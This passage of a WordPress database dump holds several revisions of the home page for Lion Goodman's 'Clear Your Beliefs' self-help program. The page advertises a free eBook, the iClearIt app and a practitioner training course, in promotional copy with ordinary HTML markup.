(1742, 2, '2014-11-13 19:06:38', '2014-11-14 00:06:38', '<img class="img-responsive" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 19:06:38', '2014-11-14 00:06:38', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1678, 2, '2014-11-11 18:39:32', '2014-11-11 23:39:32', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 15px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:39:32', '2014-11-11 23:39:32', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1656, 2, '2014-11-06 17:48:33', '2014-11-06 22:48:33', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 37px;font-size: 18px"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:48:33', '2014-11-06 22:48:33', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1652, 2, '2014-11-06 16:09:07', '2014-11-06 21:09:07', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 16:09:07', '2014-11-06 21:09:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1647, 2, '2014-11-04 18:17:58', '2014-11-04 23:17:58', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-04 18:17:58', '2014-11-04 23:17:58', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1646, 2, '2014-11-04 18:16:40', '2014-11-04 23:16:40', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px;margin-bottom: 14px !important">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated 